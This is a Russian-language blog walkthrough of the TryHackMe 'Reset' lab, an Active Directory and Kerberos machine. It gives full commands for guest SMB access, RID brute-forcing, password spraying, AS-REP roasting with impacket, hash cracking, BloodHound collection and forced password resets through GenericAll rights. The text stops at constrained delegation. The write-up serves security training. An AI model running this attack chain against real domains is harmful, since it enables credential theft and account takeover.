{"id":481722,"date":"2026-05-30T19:26:38","date_gmt":"2026-05-30T19:26:38","guid":{"rendered":"https:\/\/savepearlharbor.com\/?p=481722"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=481722","title":{"rendered":"Reset \u2014 \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u0441\u043b\u043e\u0436\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b \u043e\u0442 Tryhackme"},"content":{"rendered":"
\n
\"reset\"<\/p>\n
reset<\/figcaption><\/div>\n<\/figure>\n

\u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/h3>\n

\u0413\u043e\u0434\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u043d\u0430 \u0442\u0435\u043c\u0443 Windows AD, Kerberos. \u0412 \u043d\u0430\u0447\u0430\u043b\u0435 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0433\u043e\u0441\u0442\u0435\u0432\u043e\u0439 \u0448\u0430\u0440\u0435. \u041e\u0442\u0442\u0443\u0434\u0430 \u0434\u043e\u0441\u0442\u0430\u0435\u043c \u0444\u0430\u0439\u043b \u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u043c, \u043d\u043e \u043d\u0435 \u0437\u043d\u0430\u0435\u043c \u043e\u0442 \u043a\u0430\u043a\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438. \u041f\u0440\u043e\u0432\u043e\u0434\u0438\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u044e\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u043c 1 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043a \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u044d\u0442\u043e\u0442 \u043f\u0430\u0440\u043e\u043b\u044c. \u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e BloodHound \u0438 \u043f\u043e \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430\u043c \u0443 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u0435\u0441\u0442\u044c \u043f\u0440\u0430\u0432\u0430 Unconstrained Delegation Privilege \u043d\u0430 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 S4U2self, \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0431\u0438\u043b\u0435\u0442 \u043d\u0430 \u0438\u043c\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440.<\/p>\n\n

\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 (T1595.002)<\/h3>\n

\u041f\u0435\u0440\u0432\u0438\u0447\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0446\u0435\u043b\u0438, \u0441\u0431\u043e\u0440 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.<\/p>\n

PORT     STATE SERVICE       VERSION53\/tcp   open  domain        Simple DNS Plus88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-19 12:08:47Z)135\/tcp  open  msrpc         Microsoft Windows RPC139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)445\/tcp  open  microsoft-ds?464\/tcp  open  kpasswd5?593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0636\/tcp  open  tcpwrapped3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)3269\/tcp open  tcpwrapped3389\/tcp open  ms-wbt-server Microsoft Terminal Services<\/code>
<\/a><\/div><\/pre>\n
\u0417\u0434\u0435\u0441\u044c \u0443 \u043d\u0430\u0441 \u043f\u043e\u0440\u0442\u044b, \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0435 \u0434\u043b\u044f Active Directory. \u041f\u043e\u043b\u043d\u044b\u0439 \u043d\u0430\u0431\u043e\u0440 \u043e\u0442 smb \u0434\u043e rdp. \u0422\u0430\u043a\u0436\u0435 \u0432\u0438\u0434\u0438\u043c \u0434\u043e\u043c\u0435\u043d, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0432 \/etc\/hosts.<\/p>\n\n
\u041f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0435<\/h3>\n
\u041d\u0430\u0447\u043d\u0435\u043c \u0441 smb \u0448\u0430\u0440, \u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0443\u0437\u043d\u0430\u0442\u044c \u0431\u0430\u0437\u043e\u0432\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d\u043e \u043d\u0430\u043c, \u0445\u043e\u0442\u044c \u0447\u0442\u043e-\u0442\u043e \u0441 \u0433\u043e\u0441\u0442\u0435\u0432\u044b\u043c \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u043c.<\/p>\n
nxc smb 10.114.158.248  -u 'guest' -p '' SMB         10.114.158.248  445    HAYSTACK         [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\\guest: <\/code>
<\/a><\/div><\/pre>\n
\u0413\u043e\u0441\u0442\u044f \u0432 \u044d\u0442\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u044e\u0442 \u0437\u0430 \u0441\u0432\u043e\u0435\u0433\u043e, \u043f\u043e\u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0448\u0430\u0440 \u0438 \u044e\u0437\u0435\u0440\u043e\u0432.<\/p>\n
\u0421\u043f\u0438\u0441\u043e\u043a \u044e\u0437\u0435\u0440\u043e\u0432 \u043d\u0430 \u0434\u0430\u043d\u043d\u043e\u043c \u044d\u0442\u0430\u043f\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c, \u043e\u0434\u043d\u0430\u043a\u043e \u0441\u043f\u0438\u0441\u043e\u043a \u0448\u0430\u0440 \u0435\u0441\u0442\u044c.<\/p>\n
 ~  nxc smb 10.114.158.248  -u 'guest' -p '' --shares --users                                SMB         10.114.158.248  445    HAYSTACK         [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\\guest: SMB         10.114.158.248  445    HAYSTACK         [*] Enumerated sharesSMB         10.114.158.248  445    HAYSTACK         Share           Permissions     RemarkSMB         10.114.158.248  445    HAYSTACK         -----           -----------     ------SMB         10.114.158.248  445    HAYSTACK         ADMIN$                          Remote AdminSMB         10.114.158.248  445    HAYSTACK         C$                              Default shareSMB         10.114.158.248  445    HAYSTACK         Data            READ,WRITE      SMB         10.114.158.248  445    HAYSTACK         IPC$            READ            Remote IPCSMB         10.114.158.248  445    HAYSTACK         NETLOGON                        Logon server share SMB         10.114.158.248  445    HAYSTACK         SYSVOL                          Logon server share <\/code>
<\/a><\/div><\/pre>\n
\u0428\u0430\u0440\u0430 Data \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e. \u0417\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u0434\u043e\u043c\u0435\u043d\u0443 \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f.<\/p>\n
\"Data<\/p>\n
Data smb<\/figcaption><\/div>\n<\/figure>\n
\u0412\u0438\u0434\u0438\u043c 3 \u0444\u0430\u0439\u043b\u0430, \u043f\u0440\u0438\u0447\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u043d\u0438 \u043c\u0435\u043d\u044f\u044e\u0442 \u0441\u0432\u043e\u0438 \u0438\u043c\u0435\u043d\u0430. \u041d\u0438\u043a\u043e\u0433\u0434\u0430 \u0440\u0430\u043d\u0435\u0435 \u0442\u0430\u043a\u043e\u0433\u043e \u043d\u0435 \u0432\u0438\u0434\u0435\u043b, \u043d\u043e \u0434\u0430 \u043b\u0430\u0434\u043d\u043e. \u042f \u0440\u0435\u0448\u0438\u043b \u0441\u043a\u0430\u0447\u0430\u0442\u044c txt \u0444\u0430\u0439\u043b, \u043e\u043d \u0432\u0435\u0441\u0438\u0442, \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043d\u0438\u0447\u0435\u0433\u043e.<\/p>\n
get g1di0c4x.tb5.txtgetting file \\onboarding\\g1di0c4x.tb5.txt of size 521 as g1di0c4x.tb5.txt (1.3 KiloBytes\/sec) (average 1.3 KiloBytes\/sec)<\/code>
<\/a><\/div><\/pre>\n
\u0415\u0433\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0432\u043e\u0442 \u0442\u0430\u043a:<\/p>\n
Subject: Welcome to Reset -\u00a0Dear <USER>,Welcome aboard! We are thrilled to have you join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. Please keep this information confidential and do not share it with anyone.The initial passowrd is: ********We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very best in your new role.Best regards,The Reset Team<\/code>
<\/a><\/div><\/pre>\n
\u041e\u0442\u043b\u0438\u0447\u043d\u043e, \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c, \u043e\u0434\u043d\u0430\u043a\u043e \u043e\u0442 \u043a\u0430\u043a\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0435\u0449\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u043e\u0438\u0442 \u0432\u044b\u044f\u0441\u043d\u0438\u0442\u044c.<\/p>\n
\u0412\u044b\u0448\u0435 \u044f \u043f\u0438\u0441\u0430\u043b, \u0447\u0442\u043e \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0434\u043e\u0441\u0442\u0430\u0442\u044c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c. \u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c nxc smb \u0441 \u0444\u043b\u0430\u0433\u043e\u043c —rid-brute, \u0442\u043e \u043f\u043e\u043b\u044c\u0437\u0430\u043a\u0438 \u043f\u0440\u0435\u043a\u0440\u0430\u0441\u043d\u043e \u0434\u0430\u043c\u043f\u044f\u0442\u0441\u044f. \u0412\u0441\u044e \u043f\u043e\u0440\u0442\u044f\u043d\u043a\u0443 \u043f\u043e\u0441\u0442\u0438\u0442\u044c \u043d\u0435 \u0431\u0443\u0434\u0443\u2026<\/p>\n
\"rid-brute\"<\/p>\n
rid-brute<\/figcaption><\/div>\n<\/figure>\n
\u041f\u0435\u0440\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430<\/h3>\n
\u041e\u0442\u043b\u0438\u0447\u043d\u043e, \u0442\u0435\u043f\u0435\u0440\u044c \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0434\u043d\u0430\u043a\u043e \u0432 \u0442\u0430\u043a\u043e\u043c \u0432\u0438\u0434\u0435, \u043d\u0435\u043b\u044c\u0437\u044f \u0437\u0430\u043a\u0438\u043d\u0443\u0442\u044c \u0432 netexec, \u0447\u0442\u043e\u0431\u044b \u043e\u043d \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b \u043a \u043a\u0430\u043a\u043e\u043c\u0443 \u0438\u043c\u0435\u043d\u043d\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u043f\u0430\u0440\u043e\u043b\u044c.<\/p>\n
\u0412\u0435\u0441\u044c \u0432\u044b\u0432\u043e\u0434 —rid-brute \u044f \u0441\u043e\u0445\u043e\u0430\u043d\u0438\u043b \u0432 \u0444\u0430\u0439\u043b users.txt. \u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0443\u0442\u0438\u043b\u0438\u0442\u044b awk \u0443\u0434\u0430\u043b\u0438\u043b \u0432\u0441\u0435 \u043b\u0438\u0448\u043d\u0438\u0435 \u0441\u0442\u043e\u043b\u0431\u0446\u044b, \u043f\u0440\u0435\u0444\u0438\u043a\u0441\u044b \u0438 \u043f\u0440\u043e\u0431\u0435\u043b\u044b.<\/p>\n
awk -F'\\\\\\\\| \\\\(' '\/SidTypeUser\/ {print $2}' user.txt > users1.txt<\/code>
<\/a><\/div><\/pre>\n
\/SidTypeUser\/ \u2014 \u0438\u0449\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u0435 \u0441\u0442\u0440\u043e\u043a\u0438, \u0433\u0434\u0435 \u0442\u0438\u043f\u043e\u043c \u043e\u0431\u044a\u0435\u043a\u0442\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c (\u0438\u0433\u043d\u043e\u0440\u0438\u0440\u0443\u0435\u0442 \u0433\u0440\u0443\u043f\u043f\u044b \u0438 \u0430\u043b\u0438\u0430\u0441\u044b).<\/p>\n
-F\u2019\\\\| \\(\u2019 \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u043c awk, \u0447\u0442\u043e \u0441\u0442\u0440\u043e\u043a\u0430 \u0434\u0435\u043b\u0438\u0442\u0441\u044f \u043b\u0438\u0431\u043e \u043f\u043e \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u043c\u0443 \u0441\u043b\u044d\u0448\u0443 \\ (\u0432 \u0434\u043e\u043c\u0435\u043d\u0435 THM), \u043b\u0438\u0431\u043e \u043f\u043e \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u201c\u043f\u0440\u043e\u0431\u0435\u043b + \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u044e\u0449\u0430\u044f \u0441\u043a\u043e\u0431\u043a\u0430\u201d  (.<\/p>\n
{print $2} \u2014 \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u0440\u043e\u0432\u043d\u043e \u0442\u043e, \u0447\u0442\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043c\u0435\u0436\u0434\u0443 \u043d\u0438\u043c\u0438 (\u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f).<\/p>\n
\n
users1.txt \u2014 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0432 \u043d\u043e\u0432\u044b\u0439 \u0444\u0430\u0439\u043b.<\/p>\n<\/blockquote>\n
\u0412\u043e\u0442 \u0441 \u044d\u0442\u0438\u043c \u0444\u0430\u0439\u043b\u043e\u043c, \u0443\u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u0448\u0442\u0443\u0440\u043c\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.<\/p>\n
 ~  nxc smb 10.114.158.248  -u 'users1.txt' -p '******!' ... SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\\LILY_ONEILL:****** (Guest)<\/code>
<\/a><\/div><\/pre>\n
\u042f \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0440\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u043b, \u0447\u0442\u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0431\u0443\u0434\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c, \u043e\u0434\u043d\u0430\u043a\u043e \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u0438 \u0442\u0430\u043a \u0441\u043e\u0439\u0434\u0435\u0442.<\/p>\n
\u041f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u0441\u044f \u043f\u043e rdp, \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b smb \u0448\u0430\u0440\u044b, \u043d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0433\u043e \u043d\u0435 \u043d\u0430\u0448\u0435\u043b.<\/p>\n
\u0414\u0430\u043b\u0435\u0435 \u044f \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c Kerberos. \u0412 impacket \u0435\u0441\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044c GetNPUsers, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0438 \u0442\u0438\u043f\u0430 AS-REP Roasting \u0432 Active Directory.<\/p>\n
\u041e\u043d \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c Kerberos AS-REP \u0445\u0435\u0448\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0443 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043e\u043f\u0446\u0438\u044f \u201cDo not require Kerberos preauthentication\u201d.<\/p>\n
\u041f\u0435\u0440\u0435\u0434 \u044d\u0442\u0438\u043c \u043c\u043e\u0436\u043d\u043e \u0435\u0449\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u0447\u0442\u043e \u0432\u0441\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0432\u0430\u043b\u0438\u0434\u043d\u044b\u0435.<\/p>\n
 ~  kerbrute userenum users1.txt \\  -d thm.corp \\  --dc 10.114.158.248<\/code>
<\/a><\/div><\/pre>\n
\u0410 \u0434\u0430\u043b\u0435\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c impacket\u2026<\/p>\n
~  impacket-GetNPUsers thm.corp\/ -no-pass \\  -usersfile \/tmp\/users1.txt \\  -dc-ip 10.114.158.248 \\  -format hashcat<\/code>
<\/a><\/div><\/pre>\n
\"impacket-getnpusers\"<\/p>\n
impacket-getnpusers<\/figcaption><\/div>\n<\/figure>\n
\u0417\u0434\u0435\u0441\u044c 3 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043b\u044e\u0431\u0435\u0437\u043d\u043e \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0445\u044d\u0448\u0438. \u041b\u043e\u043c\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e 1 \u0438 \u044d\u0442\u043e TABATHA_BRITT.<\/p>\n
\u0414\u0430\u043b\u0435\u0435 \u043b\u043e\u043c\u0430\u0435\u043c \u0447\u0435\u0440\u0435\u0437 hashcat, \u043e\u043d \u0443\u0436\u0435 \u0441\u0430\u043c \u0443\u043c\u0435\u0435\u0442 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0442\u044c \u0442\u0438\u043f \u0445\u044d\u0448\u0430.<\/p>\n
hashcat ker.txt \/usr\/share\/wordlists\/rockyou.txt<\/code>
<\/a><\/div><\/pre>\n
\"hashcat\"<\/p>\n
hashcat<\/figcaption><\/div>\n<\/figure>\n
\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435<\/h3>\n
\u042d\u0442\u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u0443\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u0430\u0432\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0431\u043b\u0430\u0433\u0430\u043c\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u0442\u0432\u0430 \u0438 rdp. \u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f, \u043d\u043e \u0444\u043b\u0430\u0433\u0430 \u0437\u0434\u0435\u0441\u044c \u043d\u0435\u0442. \u041f\u043e\u0431\u0440\u043e\u0434\u0438\u0432 \u043f\u043e \u043f\u0430\u043f\u043a\u0430\u043c, \u043d\u0438\u0447\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043d\u0435 \u043d\u0430\u0448\u0435\u043b, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u043e\u0435\u0445\u0430\u043b\u0438 \u0441\u043e\u0431\u0438\u0440\u0430\u0442\u044c \u0438\u043d\u0444\u0443 \u0438 \u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u043a\u0442\u043e \u043c\u044b \u0438 \u0447\u0442\u043e \u043c\u044b.<\/p>\n
\u0417\u0430\u0432\u043e\u0434\u0438\u043c BloodHound \u0438 \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u043c, \u0432\u0441\u0435, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u043c.<\/p>\n
bloodhound-ce-python -d thm.corp -ns 10.114.158.248 \\     -dc thm.corp --zip -c all \\     -u 'TABATHA_BRITT' -p '*******'<\/code>
<\/a><\/div><\/pre>\n
\u041d\u0430 \u0432\u044b\u0445\u043e\u0434\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0430\u0440\u0445\u0438\u0432, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u0438 \u0441\u043c\u043e\u0442\u0440\u0438\u043c.<\/p>\n
\"Bloodhound_recon\"<\/p>\n
Bloodhound_recon<\/figcaption><\/div>\n<\/figure>\n
\u0417\u0434\u0435\u0441\u044c \u0443 \u043d\u0430\u0441 \u043a\u0430\u0440\u0442\u0438\u043d\u0430 \u043f\u0440\u044f\u043c\u043e \u0441\u043a\u0430\u0436\u0435\u043c \u043e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0430\u044f.<\/p>\n
\u041f\u0440\u044f\u043c\u043e \u0441\u0435\u0439\u0447\u0430\u0441 \u043c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u0430\u0431\u044c\u044e\u0437\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f SHAWNA_BRAY, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0438\u043c\u0435\u0435\u043c \u043f\u0440\u0430\u0432\u0430 GenericAll, \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043f\u043e\u043c\u0435\u043d\u044f\u0435\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e CRUZ_HALL \u0438 \u0442\u0430\u043a\u043e\u0439 \u0436\u0435 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u043e\u0439 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u0434\u043e DARLA_WINTERS.<\/p>\n
\u0413\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435<\/h3>\n
\u0412 Bloodhound \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043e \u043a\u0430\u043a \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043a\u0440\u0435\u0434\u044b \u0434\u043b\u044f \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f.<\/p>\n
net rpc password \"SHAWNA_BRAY\" \"newP@ssword2022\" -U \"thm.corp\"\/\"TABATHA_BRITT\"%\"password\" -S \"thm.corp\"<\/code>
<\/a><\/div><\/pre>\n
\u0417\u0430\u0442\u0435\u043c \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u0443 \u0438 \u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u0441\u044f \u043f\u043e\u0434 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c DARLA_WINTERS.<\/p>\n
\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0439<\/h3>\n
\u0415\u0449\u0435 \u0440\u0430\u0437 \u043d\u0443\u0436\u043d\u043e \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c BloodHound.<\/p>\n
\"Constrained_delegation\"<\/p>\n
Constrained_delegation<\/figcaption><\/div>\n<\/figure>\n
\u041c\u044b \u0432\u0438\u0434\u0438\u043c \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 Execution Prirvilege — Constrained Delegation. \u0412 Active Directory delegation \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u0432\u0438\u0441\u0443 \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.<\/p>\n
